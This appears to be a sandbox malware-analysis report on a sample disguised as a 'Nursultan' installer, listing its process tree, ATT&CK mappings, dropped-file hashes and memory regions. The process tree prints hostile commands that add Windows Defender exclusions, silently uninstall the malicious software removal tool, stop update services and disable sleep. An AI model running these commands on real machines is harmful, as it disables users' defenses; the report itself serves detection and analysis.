\??\C:\Windows\system32\conhost.exe "-392785902745213096-1126372601-1456490470278430834-1823854532-1634144283304278598"
1⤵
PID:332

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1512
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1676
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:1376
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1820
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1496
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2168
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:748
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  PID:868
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:844
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1600
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2464
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1644

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4236739457292726851306423765-13941564661660693288-1860181670337610201-1912781833"
1⤵
PID:1600

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1286040226217770918-10987294337117355875040451051310261256151212570-1618345040"
1⤵
PID:2884

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1604
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:2124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2544
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:748
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1244
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2248
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  PID:2892
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2564
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  PID:2732
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2844
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1872
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2788
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1648

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-244644348-461761748-243047082684873759-1969338848-202861387-38585221526417345"
1⤵
PID:2992

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1029772886-6698577571431669033-13782422795296520621288467396-196831091-1721478254"
1⤵
PID:2928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1667091657-64443635-1432698030314882637-86018260215854147821773167564960618584"
1⤵
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7473997562060531731-1621166120-2144385479-1581845619-514623805287880266-1125597840"
1⤵
PID:2732

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Drops file in System32 directory
PID:340
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:2112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1672
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2548
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  PID:1528
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  PID:2496
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2292
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  PID:3036
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2160
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2680
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:824
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1872
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2484

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-16887592874195955722079264377-12162079702086314667-122245137911688089641388167673"
1⤵
PID:2880

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1100527147-1918486862-13392495865706375271723713748-54711313-1602396378-1479798467"
1⤵
PID:2452

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1569585276885248954-2054584663-3329093087135173831814124436-1960241812-835501876"
1⤵
PID:2600

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Drops file in System32 directory
PID:1056
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:1252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2832
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2640
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1524
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  PID:3000
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1508
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:844
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2920
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2012
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1708
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2212
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1652

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "678828158606370308-16228241041636447636-133121814794237694-106443433481515470"
1⤵
PID:2472

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1051031400-1205750209-12747946181864990720-20838966351139748665-3310815051801138334"
1⤵
PID:2068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-573680486523488223210917835-956672575632892752-1439790822846515763922524673"
1⤵
PID:2296

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9931890272047421173-979668924-146961720690187814310168921181458155258660680803"
1⤵
PID:2956

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1335051921-139293495729089877-1486421663-20393697171445015055859433554-770770639"
1⤵
PID:1216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1574119356-1376343156-5953651421624034810133123443121213178891271606545-206926700"
1⤵
PID:2640

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1457420740-1272045102-7247587813146585071426753026-569615440-748233075859993935"
1⤵
PID:2884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4285515811111129436117315206319771067811135935179-292162847-287426616-2026698086"
1⤵
PID:1472

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-607513262-929128552-118519341234856192115837617391362943337-918694166-1481586154"
1⤵
PID:2168

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1599395541284070334-12677669651370103296-282642147-149282627538643180-787252583"
1⤵
PID:2596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2005232902225422193-1744806453-189480795517599992611738086686241230242-1096031345"
1⤵
PID:304

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Drops file in System32 directory
PID:1588
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1936
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2424
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  PID:1756
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  PID:1052
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:764
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1512
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:284
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:692
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2292
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2756
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1003652810-1700175437-1447032301848883934-1587730723-1190475969-809257808-2109698007"
1⤵
PID:2204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20773216531569856002-9374090162094706748-7047321601840066851-1451811062-108057983"
1⤵
PID:2544

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-765642579-1739623559-124971462130152100-9170738211284302262887607048664580611"
1⤵
PID:2196

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1303448949404420955199572980677902921-1868428053-1946478813-13939898601478193680"
1⤵
PID:2012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1704641059-1973990504-621677336-1124910716-2024008909123973586543810836-1211912557"
1⤵
PID:3012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1669047502-2079980406107166796757461628334916689715121454206762357001939319728"
1⤵
PID:2600

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "952932878-552980204-1277202442-1417759002-283568216-1365163528-3788710231564701786"
1⤵
PID:2928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "39785380910435521-94298273510792109003522988114557733091567560564-1512741514"
1⤵
PID:2868

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1011676457-1412976811720818407-20714652311817413102-672996805-20499213831424411441"
1⤵
PID:744

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
PID:748
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:3036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1744
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1708
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  PID:2388
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3000
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1756
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1600
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  PID:1128
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:532
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:824
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1528
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2564

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "170519993-1141280219134528277654102207533027492320230999092035326319-2057995991"
1⤵
PID:536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

Filesize
1.9MB

MD5
0df0a039309525fd27e1b5e056c92b6a

SHA1
7551c27a9123cb56c4218647966a753794ac2961

SHA256
a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f

SHA512
2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

Download Submit
C:\Users\Admin\AppData\Local\Temp\bK8jTHcPz6Sa2ly

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\fLwSF2mjVu9T63f\Display\Display.png

Filesize
378KB

MD5
1c69cd60d74e3bf87d97384cd1f3eb8d

SHA1
d6d76b7cbd7e5977a9feebe0ace055c97c346429

SHA256
77318598a98d1e8f64e33b7049b5985e6cd998a15a44d4776be5421360bc1d90

SHA512
eb25a31fb417d3164e47347299fb76dc912f441e2a9bdd579a68b5443400315f2ae1c53255297c3f748bdc6bdb44907044ffdcce1e06843af58167a54e3e29ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\hq6H1EOoCr2Ojzr

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

Filesize
229KB

MD5
f0b33cc162bfd36a995b8c90cd8ebff1

SHA1
ca1ddef08d47fc15a44a2d651b61e3decce8ebc6

SHA256
6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0

SHA512
1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d961b0f28d768377d7b52683ba4741ef

SHA1
73df46287ac5e2e615441a366497da571655600c

SHA256
130467541dc09ff17c9072c3152ccfebc901ef89b565c68e6e03c86c1addf0a8

SHA512
34229393e17d629f48f97af647b167b568fe5de917636b50987ff47d7e90462d0f89e9269068a1f6b9e47ee7e6a1fbd21de6f1c44fa3f501f28222be1336a23e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JD39DJNA4WKN72T0S406.temp

Filesize
7KB

MD5
575d731fcd0587b5e5b7910775cf5125

SHA1
42770ab7d46b1d955486f74ba8e23e0a52c83e54

SHA256
868fc7a755cdacef42e74077a6bd2bbbe195bd9e7b041c5557715bc13da38d92

SHA512
8f722750dd1d602dae50ddb13fb282b8886ea611eb252e4decf240da560da9ac3ac82294938a019321a419ae3db4d2c25de85e56c572a806df594bae57fbf8b8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
87d650dae70811f1a964b27b4a555336

SHA1
4f954a06e8b2ddb1c9c0f4daf507da37697c6f73

SHA256
cdfd829dfe207c611642edefe235d20138dc99a18ff90a312fc5ac7309dc7ff3

SHA512
9c8b90c1b9cca237f3bae0364d79c738e04dafa57826766fd48bf81386fa314fe6eef6a6a038bddee1288ba0aa5d41a57e694d5818eb5a8d6a461d61a988e759

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk

Filesize
1KB

MD5
e6396a58c3b9ce896230e8bda9f94837

SHA1
e93516d7b5249d1a1a01c91ff039a2013e58a7e5

SHA256
b3713dc9074ba278c90cea7b3e62c7675b67de81e70c82802007e6f833d40b6b

SHA512
0d98615bdd20f7a8b3aa643ea83795f8a8656f05623490748069c36821a733524f3d40159fa7ec2dbdc26eaf5ad9f74941c15522a37678f4e5666a6f5528a467

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
577f27e6d74bd8c5b7b0371f2b1e991c

SHA1
b334ccfe13792f82b698960cceaee2e690b85528

SHA256
0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

SHA512
944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

Download Submit
C:\Windows\Temp\ceihoregnmpc.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

Filesize
2.5MB

MD5
a1d8db2a1ff742bc73dd5617083f5fde

SHA1
957b182d82efb40a36099dd886ad581977880838

SHA256
d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a

SHA512
0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

Download Submit
\Users\Admin\AppData\Roaming\svchost.exe

Filesize
255KB

MD5
9af17c8393f0970ee5136bd3ffa27001

SHA1
4b285b72c1a11285a25f31f2597e090da6bbc049

SHA256
71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019

SHA512
b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3

Download Submit
memory/236-233-0x000000001B570000-0x000000001B852000-memory.dmp

Filesize
2.9MB

Download
memory/236-235-0x0000000002160000-0x0000000002168000-memory.dmp

Filesize
32KB

Download
memory/332-578-0x0000000000360000-0x0000000000548000-memory.dmp

Filesize
1.9MB

Download
memory/444-496-0x0000000000C00000-0x0000000000DE8000-memory.dmp

Filesize
1.9MB

Download
memory/692-1995-0x0000000001170000-0x0000000001358000-memory.dmp

Filesize
1.9MB

Download
memory/764-1810-0x00000000010A0000-0x0000000001288000-memory.dmp

Filesize
1.9MB

Download
memory/764-180-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/824-1756-0x0000000000BC0000-0x0000000000DA8000-memory.dmp

Filesize
1.9MB

Download
memory/832-339-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/832-340-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/832-337-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/832-338-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/876-1449-0x00000000003B0000-0x00000000003F0000-memory.dmp

Filesize
256KB

Download
memory/912-1948-0x00000000010D0000-0x00000000012B8000-memory.dmp

Filesize
1.9MB

Download
memory/920-1362-0x0000000000C20000-0x0000000000E08000-memory.dmp

Filesize
1.9MB

Download
memory/1036-1308-0x0000000001200000-0x00000000013E8000-memory.dmp

Filesize
1.9MB

Download
memory/1056-108-0x0000000001E40000-0x0000000001E48000-memory.dmp

Filesize
32KB

Download
memory/1056-107-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/1056-491-0x0000000002820000-0x0000000002828000-memory.dmp

Filesize
32KB

Download
memory/1080-1069-0x0000000000ED0000-0x00000000010B8000-memory.dmp

Filesize
1.9MB

Download
memory/1124-189-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/1124-190-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/1124-1152-0x00000000012D0000-0x0000000001310000-memory.dmp

Filesize
256KB

Download
memory/1252-41-0x0000000001020000-0x0000000001208000-memory.dmp

Filesize
1.9MB

Download
memory/1252-43-0x0000000005930000-0x00000000059E6000-memory.dmp

Filesize
728KB

Download
memory/1312-435-0x00000000013D0000-0x0000000001410000-memory.dmp

Filesize
256KB

Download
memory/1328-1458-0x00000000009E0000-0x0000000000BC8000-memory.dmp

Filesize
1.9MB

Download
memory/1472-1614-0x0000000000030000-0x0000000000218000-memory.dmp

Filesize
1.9MB

Download
memory/1520-1121-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

Filesize
2.9MB

Download
memory/1520-73-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/1520-74-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/1572-1658-0x0000000000350000-0x0000000000538000-memory.dmp

Filesize
1.9MB

Download
memory/1600-921-0x0000000000D40000-0x0000000000F28000-memory.dmp

Filesize
1.9MB

Download
memory/1672-968-0x0000000000A80000-0x0000000000C68000-memory.dmp

Filesize
1.9MB

Download
memory/1704-305-0x0000000001240000-0x0000000001280000-memory.dmp

Filesize
256KB

Download
memory/1748-2050-0x00000000011F0000-0x0000000001230000-memory.dmp

Filesize
256KB

Download
memory/1748-777-0x0000000000170000-0x0000000000358000-memory.dmp

Filesize
1.9MB

Download
memory/1760-182-0x0000000001170000-0x00000000011B0000-memory.dmp

Filesize
256KB

Download
memory/1772-1854-0x0000000000AB0000-0x0000000000C98000-memory.dmp

Filesize
1.9MB

Download
memory/1860-278-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/1912-8-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/1912-7-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/1912-6-0x0000000002D20000-0x0000000002DA0000-memory.dmp

Filesize
512KB

Download
memory/1920-63-0x0000000002080000-0x0000000002088000-memory.dmp

Filesize
32KB

Download
memory/1920-62-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

Filesize
2.9MB

Download
memory/1928-1115-0x0000000000B60000-0x0000000000D48000-memory.dmp

Filesize
1.9MB

Download
memory/1960-0-0x000007FEF56E3000-0x000007FEF56E4000-memory.dmp

Filesize
4KB

Download
memory/1960-1-0x000000013F780000-0x000000013FA80000-memory.dmp

Filesize
3.0MB

Download
memory/1992-100-0x0000000000190000-0x0000000000378000-memory.dmp

Filesize
1.9MB

Download
memory/2008-1161-0x0000000000FC0000-0x00000000011A8000-memory.dmp

Filesize
1.9MB

Download
memory/2024-670-0x0000000000A10000-0x0000000000A50000-memory.dmp

Filesize
256KB

Download
memory/2068-158-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2084-1556-0x0000000001230000-0x0000000001270000-memory.dmp

Filesize
256KB

Download
memory/2092-137-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2152-639-0x00000000009A0000-0x0000000000B88000-memory.dmp

Filesize
1.9MB

Download
memory/2208-1698-0x00000000010C0000-0x00000000012A8000-memory.dmp

Filesize
1.9MB

Download
memory/2240-1025-0x0000000000040000-0x0000000000228000-memory.dmp

Filesize
1.9MB

Download
memory/2256-445-0x0000000000F90000-0x0000000001178000-memory.dmp

Filesize
1.9MB

Download
memory/2292-412-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2492-1892-0x0000000000E00000-0x0000000000FE8000-memory.dmp

Filesize
1.9MB

Download
